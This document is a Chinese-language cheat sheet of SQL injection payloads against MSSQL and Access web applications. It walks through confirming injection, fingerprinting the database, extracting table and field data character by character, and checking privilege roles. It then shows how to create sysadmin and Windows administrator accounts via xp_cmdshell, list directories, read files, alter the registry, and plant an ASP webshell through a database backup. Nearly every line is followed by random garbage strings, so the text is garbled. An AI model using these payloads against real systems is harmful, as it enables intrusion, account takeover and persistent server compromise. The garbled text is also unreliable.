1.判断是否有注入;and 1=1 ;and 1=2 6ex/TySM
2.初步判断是否是mssql ;and user>0 /NFj(+&g+
yu|8_<bq
3.注入参数是字符'and [查询条件] and ''=' FUb\e-Q=
^|>PA:%
4.搜索时没过滤参数的'and [查询条件] and '%25'=' X-Kh(Z
2(+2+}
5.判断数据库系统 q`a'gJx#y
1#2 I
;and (select count(*) from sysobjects)>0 mssql MUc$j&
@ioJ]$o7
;and (select count(*) from msysobjects)>0 access [ 5b--O
a0E)2vt4
j0aXyLNX
k5e;fA/w
6.猜数据库 ;and (select Count(*) from [数据库名])>0 s`8= 3]w
9T9!kb
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 {duz\k2
}C?'BRX
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 2\{M:\2o
7U"g3a)=
9.(1)猜字段的ascii值(access) itP,\k7>d
*#|&JIEsi
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 783,s_
>T-u~i$s
(2)猜字段的ascii值(mssql) *n
]GsOOn
C2I_%nU Z1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 aFm_;\
&`r-.&Y
10.测试权限结构(mssql) -3*]G^y2
#q$HQ&k
hWLA<wdb
f~R(D0@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- _ <V)-Y
;`{H!w[D
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 7Q9 w?y~c
"+nRGEs6
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- U9 s&
?e4YGOe.
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- t%)7t9j
#gN&lY:CFn
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- bsli0FJSh'
_J#zY-j
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- lfgq=8d
Qd{CMmx
;and 1=(select IS_MEMBER('db_owner'));-- ;ef}}K
o:'MpKm
GL}]y -f
ec;o\erPG
11.添加mssql和系统的帐户 I$G['`XX/
{dlXLx!B
;exec master.dbo.sp_addlogin username;-- ^uc=f2=>,
;exec master.dbo.sp_password null,username,password;-- R) h#Vc(
Dml;#'IF3
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- #:_Kws>+
_;y9$"A
;exec master.dbo.xp_cmdshell 'net user username password Dx?,=~W9
LonxT&"!D
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Bkc4TO
i&fuSk EP
;exec master.dbo.xp_cmdshell 'net user username password /add';-- &6!)jIWJ
8dA~\a
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- #zs~," dRv
T?0eVvM
*?vCC+c
<n$'voR7]
12.(1)遍历目录 (%6P0*
Nai2W<,
;create table dirs(paths varchar(100), id int) Sz`,X0a
t3_O H^
;insert dirs exec master.dbo.xp_dirtree 'c:\' 0#hlsfc]\
1CZgb
;and (select top 1 paths from dirs)>0 `U_)98
6d}lw6L
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) /{_:{G!Q0
9TC,!0U{_.
q3!bky\
@S;'@VC
(2)遍历目录 /,yd+wcW#
mq.`X:e
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ZMlm)?m
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 bAqA1y3=
p]TAELy
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 2%m BK
&p@O_0nF
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 DyQy^G'%l
C,r;VyW6BI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 v\ )W?i*l
M%m4i9~!?
(L&d!$,Dv
[z{1*Xc
13.mssql中的存储过程 g!|kp?
=dKtV.L
xp_regenumvalues 注册表根键, 子键 :5<UkN)R(
#;yZ
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 #;e:A8IQ
6bC3O4Rw
xp_regread 根键,子键,键值名 x 9fip-
}my`K
;exec xp_regread S,UDezxg
5t]H?b8
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 q0vQa
A;M'LM- M
xp_regwrite 根键,子键, 值名, 值类型, 值 u6JM]kR
V)25$aKW7
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 }Sv:`9=
Y$_B1_
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 #\OA )`U
0GeTSFj
xp_regdeletevalue 根键,子键,值名 usF.bkTp
8l`*]1.W<
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 #*Ctwl,T
h:|qC`}
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 wmLs/:~
YS0<qSN
} q8ASYNc
4tBYR9|
14.mssql的backup创建webshell =7eV/3
8d'0N
use model Wne@<+mX
^1.By^
$
create table cmd(str image); 26h21Z16q
eSq.GtI
insert into cmd(str) values (''); b\2
ds,
~4'$yWG
backup database model to disk='c:\l.asp'; FZnw0tMq
3!]rmZ-W
(GfZ*
> ~O.@|
15.mssql内置函数 tWcHb #
VOLj>w
;and (select @@version)>0 获得Windows的版本号 gPPkT"
WNtW|IV
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ww1[rCh\+
]/L0,^RI
;and (select user_name())>0 爆当前系统的连接用户 <e6#lFQqK
OneY_<*a<
;and (select db_name())>0 得到当前连接的数据库 D&y7-/
0g8NHkM:2a
&};zvo~P.
;$g?T~v7
16.简洁的webshell V'gh6`v
5{,<j\#L
use model 9pfIzs
su3
ECmW`#Otb)
create table cmd(str image); Z%UP6%
,ig/s2ZG6X
insert into cmd(str) values (''); 8}:nGK|kx
FS.L\MjV]U
backup database model to disk='g:\wwwtest\l.asp';